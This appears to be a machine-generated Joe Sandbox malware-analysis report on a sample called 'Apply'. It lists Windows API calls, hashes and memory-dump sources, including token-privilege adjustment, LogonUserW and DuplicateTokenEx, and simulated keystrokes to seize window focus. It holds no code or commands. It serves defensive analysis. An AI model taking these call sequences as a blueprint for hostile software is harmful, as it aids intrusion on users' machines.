                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: ff5c1431ce5558fcb5b0acbe4b977bf582f70717a56c74e0bef88ea935b29eb5
                                                    • Instruction ID: 22b9ee527ca661dd0ad55c69b61211c3d387c3baabb721e98f9b4ae527cecf7b
                                                    • Opcode Fuzzy Hash: ff5c1431ce5558fcb5b0acbe4b977bf582f70717a56c74e0bef88ea935b29eb5
                                                    • Instruction Fuzzy Hash: 12115531200B04DFD7248F05D8C0BA2B7E8FB44365F04852EE9AA8BA81C771E848CB21
                                                    APIs
                                                      • Part of subcall function 00884FCD: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00883179,00000001,00000364,?,?,?,0000000A,00000000), ref: 0088500E
                                                    • _free.LIBCMT ref: 008853BC
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: AllocateHeap_free
                                                    • String ID:
                                                    • API String ID: 614378929-0
                                                    • Opcode ID: 909a4374356f8f907344afb735ef1ce9beac61351e9b783084be2677b09e34aa
                                                    • Instruction ID: 189e6d7e598f4ac1f8b427c9a9bc68f5eee1ddacca504ab18b366d44d054d51b
                                                    • Opcode Fuzzy Hash: 909a4374356f8f907344afb735ef1ce9beac61351e9b783084be2677b09e34aa
                                                    • Instruction Fuzzy Hash: 750126726047096BE331DE699841A5AFBD9FB8A370F25062DE584C3280EA70A8058765
                                                    APIs
                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,008527FA,00922408,?,?,?,?,?,?,?,00851727,?), ref: 008519EA
                                                      • Part of subcall function 00857467: _wcslen.LIBCMT ref: 0085747A
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: FullNamePath_wcslen
                                                    • String ID:
                                                    • API String ID: 4019309064-0
                                                    • Opcode ID: 37c6cd194f6c1c74facd557dee3e6f0f4439ac5dd6dbfb5aaae9e2ad05a79160
                                                    • Instruction ID: 797c3cc7389524060cbb78f9728a38fe7130829a53df99f0bc779b32ef914af0
                                                    • Opcode Fuzzy Hash: 37c6cd194f6c1c74facd557dee3e6f0f4439ac5dd6dbfb5aaae9e2ad05a79160
                                                    • Instruction Fuzzy Hash: EF11A135605329AACF12FBA89846EC977F8FF08355B4040A1BD59E7295EE70D78C8722
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b78347c3af4faeddaf6041936be61502238db1ea0e0acd99a45db38c25bd97f7
                                                    • Instruction ID: 61da9879bd20f3a7eaca12b3d0c62b8138e8da33c9f6136e70c171ed426f0fc5
                                                    • Opcode Fuzzy Hash: b78347c3af4faeddaf6041936be61502238db1ea0e0acd99a45db38c25bd97f7
                                                    • Instruction Fuzzy Hash: D9F02833501A149AD6313A2E8C05B6A3B98FF86338F108B55FA69D31D2EF70D8068797
                                                    APIs
                                                    • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 008CF6B1
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentVariable
                                                    • String ID:
                                                    • API String ID: 1431749950-0
                                                    • Opcode ID: e4ff4981dc1cdb2f2d7aaba0d48dcf3b476d0381587af57e4904ae3c7267630e
                                                    • Instruction ID: f6ad7893222c30c3d2ff07e3d9e9b0b9e89639dbec7cf25b2c0ed3916c0c8a11
                                                    • Opcode Fuzzy Hash: e4ff4981dc1cdb2f2d7aaba0d48dcf3b476d0381587af57e4904ae3c7267630e
                                                    • Instruction Fuzzy Hash: 0CF01D71604204AFCB05EB69DC46D9F7BB8FF45750F404055F509DB261DA70EA458B62
                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00883179,00000001,00000364,?,?,?,0000000A,00000000), ref: 0088500E
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    • Opcode ID: c3613916c108c08aef74cde496ddd585889d4d063a11e122eb00d2b5f4714265
                                                    • Instruction ID: 9df290250d7110770354ef6444e5efa6ee04ef220b6e0a7a1d2d8ab4fb0ece03
                                                    • Opcode Fuzzy Hash: c3613916c108c08aef74cde496ddd585889d4d063a11e122eb00d2b5f4714265
                                                    • Instruction Fuzzy Hash: 2EF0E232659E29A7DB317F269C01B5A3748FF417B1B158015BC18EA195CE70EC0197E2
                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,00876A59,?,0000015D,?,?,?,?,00878590,000000FF,00000000,?,?), ref: 00883BA2
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    • Opcode ID: 25360a10bd09a27f646e015c76d91c35a21a67ef2c3e91d1edfe1ed85266e859
                                                    • Instruction ID: 784dda881936cac7028d83e13b2f07c279ec7e9f008c04b88c92fd499e05503d
                                                    • Opcode Fuzzy Hash: 25360a10bd09a27f646e015c76d91c35a21a67ef2c3e91d1edfe1ed85266e859
                                                    • Instruction Fuzzy Hash: 3AE06DB1216A29AAE7313A6A9D04B5E7658FB42FB0F160121AC15E60D4EB60DE0183E2
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6de52bc216e257055782dd03a01faa4692ca69451ff013693b66346043dde3e8
                                                    • Instruction ID: f403cb3319e768189a526bdbffaa1837db33f2ca7c5fa0a1cdca92da6fcc0eca
                                                    • Opcode Fuzzy Hash: 6de52bc216e257055782dd03a01faa4692ca69451ff013693b66346043dde3e8
                                                    • Instruction Fuzzy Hash: 5DF039B1105B51CFDB35AF64D4A0912BBF5FF1432A3288A7EE5DAC6620D731A848DF40
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: __fread_nolock
                                                    • String ID:
                                                    • API String ID: 2638373210-0
                                                    • Opcode ID: c1e6ecd98d5466ae11fb2f40a92f4ea408688d1151f6508a8c6824d50e7e42d0
                                                    • Instruction ID: c1dce43d80ee33d8d3418ff1607789b8bef64312e672a7210eb2ffc039dd953b
                                                    • Opcode Fuzzy Hash: c1e6ecd98d5466ae11fb2f40a92f4ea408688d1151f6508a8c6824d50e7e42d0
                                                    • Instruction Fuzzy Hash: EDF0587140020DFFDF05CF90C941EAE7BB9FB18318F208484F9148A111D336EA21ABA1
                                                    APIs
                                                    • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00852F70
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: IconNotifyShell_
                                                    • String ID:
                                                    • API String ID: 1144537725-0
                                                    • Opcode ID: ac64b89da46a586af259d3ea48832fb34792841c16aa1004490a3fe8b256280b
                                                    • Instruction ID: 89fcd047cb706d16d6d4214086ca418f280a54185fa95321f1f9f03e9741505d
                                                    • Opcode Fuzzy Hash: ac64b89da46a586af259d3ea48832fb34792841c16aa1004490a3fe8b256280b
                                                    • Instruction Fuzzy Hash: 75F0A770914344AFDB62DF24EC457967BFCB70170CF0400E9A588D6181DB744789CF41
                                                    APIs
                                                    • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 008531A9
                                                      • Part of subcall function 00857467: _wcslen.LIBCMT ref: 0085747A
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: LongNamePath_wcslen
                                                    • String ID:
                                                    • API String ID: 541455249-0
                                                    • Opcode ID: 270218bb6c1dd265161cb45210b331a873868819e1e6dcf476c36894f467fc9c
                                                    • Instruction ID: 88e8c4fce4798593fbc9b9abc2cf321005a307eb9e5b5dbcf3206f4d11ead042
                                                    • Opcode Fuzzy Hash: 270218bb6c1dd265161cb45210b331a873868819e1e6dcf476c36894f467fc9c
                                                    • Instruction Fuzzy Hash: 42E0C272A002246BCB21A39CDC06FEAB7EDEFC8790F0440B1FD09D7248DA60ED848691
                                                    APIs
                                                      • Part of subcall function 00853989: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00853A5A
                                                      • Part of subcall function 0085DCC0: GetInputState.USER32 ref: 0085DDA7
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00852853
                                                      • Part of subcall function 00852F14: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00852F70
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                    • String ID:
                                                    • API String ID: 3667716007-0
                                                    • Opcode ID: 9fd8e88a59233111ac418bee0e5d6ddc1de728d96787062479306e8f49571347
                                                    • Instruction ID: 9d5eb88b7b9acd4ba6daa20ca2de25b4af4ff6a7f4bb782db71bad45448f28ca
                                                    • Opcode Fuzzy Hash: 9fd8e88a59233111ac418bee0e5d6ddc1de728d96787062479306e8f49571347
                                                    • Instruction Fuzzy Hash: 8DE0866170434517CB18FB78B85196DEBA4FBD1356F40153EF902C6162DE25498D8353
                                                    APIs
                                                    • FindCloseChangeNotification.KERNEL32(?,?,?,008532C7), ref: 00856923
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: ChangeCloseFindNotification
                                                    • String ID:
                                                    • API String ID: 2591292051-0
                                                    • Opcode ID: 0270e2959aa39f962a351a427b416f2684125bbdbd49b9dbb50f25456d2cf87c
                                                    • Instruction ID: 25c5e19c33ff795661186e2cac873d9cb6320bc0e0f6bfe535b50017974cdb89
                                                    • Opcode Fuzzy Hash: 0270e2959aa39f962a351a427b416f2684125bbdbd49b9dbb50f25456d2cf87c
                                                    • Instruction Fuzzy Hash: D7E09275400B05CEC3314F1AE804412FAE4FED13623204A2ED4E583660E3B0589ACB90
                                                    APIs
                                                    • CreateFileW.KERNEL32(00000000,00000000,?,00890A57,?,?,00000000,?,00890A57,00000000,0000000C), ref: 0089070A
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 4b4632f91c8c463dd3bc050e38532b8c429adbaad06ca31efa9b6bf3df2c2cc6
                                                    • Instruction ID: c558b3bea8c0507ba4ed757fb557e85dce290fb8377fc8477d9c23b62fcc0623
                                                    • Opcode Fuzzy Hash: 4b4632f91c8c463dd3bc050e38532b8c429adbaad06ca31efa9b6bf3df2c2cc6
                                                    • Instruction Fuzzy Hash: 05D06C3200024DBFDF028F84DD46EDA3BAAFB48714F014000BE1856020C732E821AB91
                                                    APIs
                                                    • GetFileAttributesW.KERNEL32(?,008BD57A), ref: 008BE7DB
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: 34f63a967fff82d02191510ed4a458e9eea25320dd4adc79162ad553059657d8
                                                    • Instruction ID: d1dedd4da3f75219bb05863a77d7e215d7df3acb667dc197e2d52fc15fbcec77
                                                    • Opcode Fuzzy Hash: 34f63a967fff82d02191510ed4a458e9eea25320dd4adc79162ad553059657d8
                                                    • Instruction Fuzzy Hash: 09B0923800060009AD280A385A488D9230AB8433A97D81B80F67EC92F18B39980BE614
                                                    APIs
                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00851736
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: InfoParametersSystem
                                                    • String ID:
                                                    • API String ID: 3098949447-0
                                                    • Opcode ID: ec2aea48c0683d9238742a2956aeae5b8ddb4bd4c986c34754453f7ee9b46717
                                                    • Instruction ID: 555de5f4293638f1dc74684f0d9032f5f739f706f04b10ec84ab8054c3a2d1cc
                                                    • Opcode Fuzzy Hash: ec2aea48c0683d9238742a2956aeae5b8ddb4bd4c986c34754453f7ee9b46717
                                                    • Instruction Fuzzy Hash: 91C09232394304AFE6309B80BC8BF14B765A318B00F00C402BA0D5A1F383B66429FE20
                                                    APIs
                                                      • Part of subcall function 008BD98E: FindFirstFileW.KERNEL32(?,?), ref: 008BDA05
                                                      • Part of subcall function 008BD98E: DeleteFileW.KERNEL32(?,?,?,?), ref: 008BDA55
                                                      • Part of subcall function 008BD98E: FindNextFileW.KERNEL32(00000000,00000010), ref: 008BDA66
                                                      • Part of subcall function 008BD98E: FindClose.KERNEL32(00000000), ref: 008BDA7D
                                                    • GetLastError.KERNEL32 ref: 008C6398
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                    • String ID:
                                                    • API String ID: 2191629493-0
                                                    • Opcode ID: 36ccd6ea8244571347118fc440d312f1c44c8f3a0f604d95e284be21a9710b15
                                                    • Instruction ID: 24fb388571f255ab009806b5196a3ec958a1dc5f70a42a752bf3cdbacf4c5206
                                                    • Opcode Fuzzy Hash: 36ccd6ea8244571347118fc440d312f1c44c8f3a0f604d95e284be21a9710b15
                                                    • Instruction Fuzzy Hash: 4BF08C322102109FCB10EF5DD851B6AB7E5FF48B61F048059F90ADB352EB70BC458B92
                                                    APIs
                                                    • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0086F656
                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0086F673
                                                    • IsIconic.USER32(00000000), ref: 0086F67C
                                                    • SetForegroundWindow.USER32(00000000), ref: 0086F68E
                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0086F6A4
                                                    • GetCurrentThreadId.KERNEL32 ref: 0086F6AB
                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0086F6B7
                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 0086F6C8
                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 0086F6D0
                                                    • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0086F6D8
                                                    • SetForegroundWindow.USER32(00000000), ref: 0086F6DB
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0086F6F4
                                                    • keybd_event.USER32(00000012,00000000), ref: 0086F6FF
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0086F709
                                                    • keybd_event.USER32(00000012,00000000), ref: 0086F70E
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0086F717
                                                    • keybd_event.USER32(00000012,00000000), ref: 0086F71C
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0086F726
                                                    • keybd_event.USER32(00000012,00000000), ref: 0086F72B
                                                    • SetForegroundWindow.USER32(00000000), ref: 0086F72E
                                                    • AttachThreadInput.USER32(?,000000FF,00000000), ref: 0086F74C
                                                    • AttachThreadInput.USER32(?,00000000,00000000), ref: 0086F754
                                                    • AttachThreadInput.USER32(00000000,000000FF,00000000), ref: 0086F75C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconic
                                                    • String ID: Shell_TrayWnd
                                                    • API String ID: 1155518417-2988720461
                                                    • Opcode ID: 436985a0339e5bf5b002dcb03cb39d49290159931476ddd1eeb44ecee26af924
                                                    • Instruction ID: 003891d884d4d56b8c8e23d58847ebf212d225630c1d568c321439bc075d63ea
                                                    • Opcode Fuzzy Hash: 436985a0339e5bf5b002dcb03cb39d49290159931476ddd1eeb44ecee26af924
                                                    • Instruction Fuzzy Hash: D3313271A40358BAEB206BB59C8AF7F7E6CFB44B54F110065FB05FB1D1D6B19D00AAA0
                                                    APIs
                                                      • Part of subcall function 008B1DA5: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008B1DEF
                                                      • Part of subcall function 008B1DA5: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 008B1E1C
                                                      • Part of subcall function 008B1DA5: GetLastError.KERNEL32 ref: 008B1E2C
                                                    • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 008B1968
                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 008B198A
                                                    • CloseHandle.KERNEL32(?), ref: 008B199B
                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 008B19B3
                                                    • GetProcessWindowStation.USER32 ref: 008B19CC
                                                    • SetProcessWindowStation.USER32(00000000), ref: 008B19D6
